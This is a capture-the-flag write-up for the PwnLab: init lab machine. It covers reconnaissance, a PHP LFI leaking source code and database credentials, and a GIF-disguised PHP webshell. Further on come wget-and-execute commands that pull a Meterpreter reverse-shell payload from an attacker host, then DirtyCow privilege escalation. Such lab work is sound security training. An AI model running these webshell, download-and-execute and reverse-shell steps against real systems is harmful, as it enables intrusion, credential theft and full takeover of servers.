-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

# $Id: 2017_pwnlab.txt,v 1.0 2017/03/16 10:35:22 dhn Exp $

Writeup PwnLab: init [1]

0x0) found the ports

[dhn]::[~/dev/ctf/write_up/boot2root] export ip=174.0.42.3
[dhn]::[~/dev/ctf/write_up/boot2root] nmap -A -T4 -p- $ip

Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-16 04:44 EDT
Nmap scan report for S0106c8fb267da995.cg.shawcable.net (174.0.42.3)
Host is up (0.00021s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          42451/udp  status
|_  100024  1          54275/tcp  status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
|_mysql-info: ERROR: Script execution failed (use -d to debug)
54275/tcp open  status  1 (RPC #100024)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.07 seconds

0x1) use gobuster to found some interested folder/files

[dhn]::[~/dev/ctf/write_up/boot2root] gobuster -w /usr/share/wordlists/dirb/common.txt -u http://$ip

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://174.0.42.3/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 301,302,307,200,204
=====================================================
/images (Status: 301)
/index.php (Status: 200)
/upload (Status: 301)
=====================================================

0x2) open firefox and go to https://$ip

0x3) use the LFI in combination with an php wrapper [2]

[dhn]::[~/dev/ctf/write_up/boot2root] curl -s http://$ip/?page=php://filter/convert.base64-encode/resource=index | grep -e '[^\ ]\{40,\}' | base64 -d
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
        include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
        if (isset($_GET['page']))
        {
                include($_GET['page'].".php");
        }
        else
        {
                echo "Use this server to upload and share image files inside the intranet";
        }
?>
</center>
</body>

[dhn]::[~/dev/ctf/write_up/boot2root] curl -s http://$ip/?page=php://filter/convert.base64-encode/resource=upload | grep -e '[^\ ]\{40,\}' | base64 -d
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
        <body>
                <form action='' method='post' enctype='multipart/form-data'>
                        <input type='file' name='file' id='file' />
                        <input type='submit' name='submit' value='Upload'/>
                </form>
        </body>
</html>
<?php
if(isset($_POST['submit'])) {
        if ($_FILES['file']['error'] <= 0) {
                $filename  = $_FILES['file']['name'];
                $filetype  = $_FILES['file']['type'];
                $uploaddir = 'upload/';
                $file_ext  = strrchr($filename, '.');
                $imageinfo = getimagesize($_FILES['file']['tmp_name']);
                $whitelist = array(".jpg",".jpeg",".gif",".png");

                if (!(in_array($file_ext, $whitelist))) {
                        die('Not allowed extension, please upload images only.');
                }

                if(strpos($filetype,'image') === false) {
                        die('Error 001');
                }

                if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
                        die('Error 002');
                }

                if(substr_count($filetype, '/')>1){
                        die('Error 003');
                }

                $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

                if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
                        echo "<img src=\"".$uploadfile."\"><br />";
                } else {
                        die('Error 4');
                }
        }
}

?>

[dhn]::[~/dev/ctf/write_up/boot2root] curl -s http://$ip/?page=php://filter/convert.base64-encode/resource=login | grep -e '[^\ ]\{40,\}' | base64 -d
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
        $luser = $_POST['user'];
        $lpass = base64_encode($_POST['pass']);

        $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
        $stmt->bind_param('ss', $luser, $lpass);

        $stmt->execute();
        $stmt->store_Result();

        if ($stmt->num_rows == 1)
        {
                $_SESSION['user'] = $luser;
                header('Location: ?page=upload');
        }
        else
        {
                echo "Login failed.";
        }
}
else
{
        ?>
        <form action="" method="POST">
        <label>Username: </label><input id="user" type="test" name="user"><br />
        <label>Password: </label><input id="pass" type="password" name="pass"><br />
        <input type="submit" name="submit" value="Login">
        </form>
        <?php
}

[dhn]::[~/dev/ctf/write_up/boot2root] curl -s http://$ip/?page=php://filter/convert.base64-encode/resource=config | grep -e '[^\ ]\{40,\}' | base64 -d
<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

0x4) take the leaked password and connect to the mysql server

[dhn]::[~/dev/ctf/write_up/boot2root] mysql -u root -p -h $ip
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 80
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

0x5) grab password "hashes"

mysql> use "Users"
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)

mysql> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.01 sec)

mysql> exit
Bye

# decode base64 strings

kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo

0x6) use the credentials to login into the page and upload an webshell.
     the upload.php script allows only ".jpg",".jpeg",".gif",".png" files.

[dhn]::[~/dev/ctf/write_up/boot2root] cat evil.gif
GIF89a1

<?php system($_POST["cmd"]); ?>

0x7) we can trigger the payload in the uploaded *.gif by using the "lang"
     cookie flag in the index.php:

    if (isset($_COOKIE['lang']))
    {
        include("lang/".$_COOKIE['lang']);
    }

[dhn]::[~/dev/ctf/write_up/boot2root] curl -s --data "cmd=id" http://$ip/ -b "lang=../upload/1b7d2e8797d863fdf63594e390c18255.gif" | head -n3
GIF89a1

uid=33(www-data) gid=33(www-data) groups=33(www-data)

0x8) create meterpreter and start multi handler

[dhn]::[~/dev/ctf/write_up/boot2root] msfvenom -p linux/x86/meterpreter/reverse_tcp -a x86 --platform linux -b '\\x00' LHOST="10.9.0.2" LPORT=7766 -f elf -o evil_dhn
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 98 (iteration=0)
x86/shikata_ga_nai chosen with final size 98
Payload size: 98 bytes
Final size of elf file: 182 bytes
Saved as: evil_dhn

0x9) use the webshell to download and execute the meterpreter

[dhn]::[~/dev/ctf/write_up/boot2root] curl -s --data "cmd=wget http://10.9.0.2:8000/dhn -O /tmp/evil" http://$ip/ -b "lang=../upload/1b7d2e8797d863fdf63594e390c18255.gif" | head -n3
[dhn]::[~/dev/ctf/write_up/boot2root] curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/ -b "lang=../upload/1b7d2e8797d863fdf63594e390c18255.gif" | head -n3
[dhn]::[~/dev/ctf/write_up/boot2root] curl -s --data "cmd=bash -c /tmp/evil" http://$ip/ -b "lang=../upload/1b7d2e8797d863fdf63594e390c18255.gif" | head -n3

0xa) gathering information

msf exploit(handler) > run

[*] Started reverse TCP handler on 10.9.0.2:7766
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 174.0.42.3
[*] Meterpreter session 1 opened (10.9.0.2:7766 -> 174.0.42.3:40256) at 2017-02-07 13:04:30 +0100

meterpreter > sysinfo
Computer    : pwnlab
OS          : Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686
Meterpreter : php/linux
meterpreter > shell
Process 17286 created.
Channel 0 created.
/bin/sh -i
/bin/sh: 0: can't access tty; job control turned off
$ w
 07:08:37 up 1 day,  3:19,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

0xb) privilege escalation - dirtycow

$ gcc cow32.c -o cowroot -pthread 2>/dev/null
$ ./cowroot
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 53112
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
root@pwnlab:/tmp# 

0xc) captcha the flag

root@pwnlab:/tmp# cd /root/
root@pwnlab:/root# ls
flag.txt  messages.txt
root@pwnlab:/root# cat flag.txt
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'
root@pwnlab:/root#

[1] https://www.vulnhub.com/entry/pwnlab-init,158/
[2] http://www.php.net/manual/en/wrappers.php.php

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJYylxwAAoJEKjdmUcmQRI8u6MP/3Ii2YjsjGliHKM4GIeKo90J
u5JMXkJNATJqfVKwTClr6lzlrHTtzmFoUVNstp9oMzPo76O56d25hPpzgXbPTg4A
tpYpwWPnGiTKCc8pkxv05cA861lbBMr3xb5aZW/7bdbJ/425JvCwD88RGkgWnqdu
+puTyleIXYLQx/4DUJWl04G1WoWgd0GB9Y4K514iHVeqUd/kLi3ro5Pkl9MVs5rJ
jZ/2hYClESiYqw21fLxmpQV6zAsTYZR5Racbb8e2t5YKVioMvi2p7/n2o8oy+BZx
YJYCWrIjcbc1iL1/aHkvsK0Do3lUgZ3h7+wj8CbJWwdZftshYBU/Vx65FNzbcTsk
yKtoBOl3BVwatYdIZQGg/K22BdKTUlOTpyss7cBHqVssQuezXNIh1JxbipKH/KxO
rUUkknXQak5tu4OWknA6UQQDddanAwG39ApMHuAH4+MPFN3MqFOjB0DWJU0of2dU
T4aQ3X54nX4IkCpQWV7jUPhyt4SDkz8lWdeCbeRWPqPT4yBLtKHhS6Mvz9QdPVY4
UIdr0HMO/DXnoQLPSfb0gIQGtpWBSstvX4jeXWDOTbqku/k0f0EtmMMOLF2l7H70
TJxyK8lciPo0OkcH3Kmhibn9+xygUwgIMVVKzh06MgMRZdX3aeP0VoA4Pay3HkMO
KiAjXv+8eyLmqGteLxiJ
=MGM1
-----END PGP SIGNATURE-----